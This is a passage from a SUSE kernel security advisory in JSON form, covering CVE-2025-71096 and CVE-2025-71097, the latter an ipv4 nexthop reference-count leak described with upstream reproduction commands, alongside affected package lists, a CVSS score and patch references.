netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71096",
"url": "https://www.suse.com/security/cve/CVE-2025-71096"
},
{
"category": "external",
"summary": "SUSE Bug 1256606 for CVE-2025-71096",
"url": "https://bugzilla.suse.com/1256606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
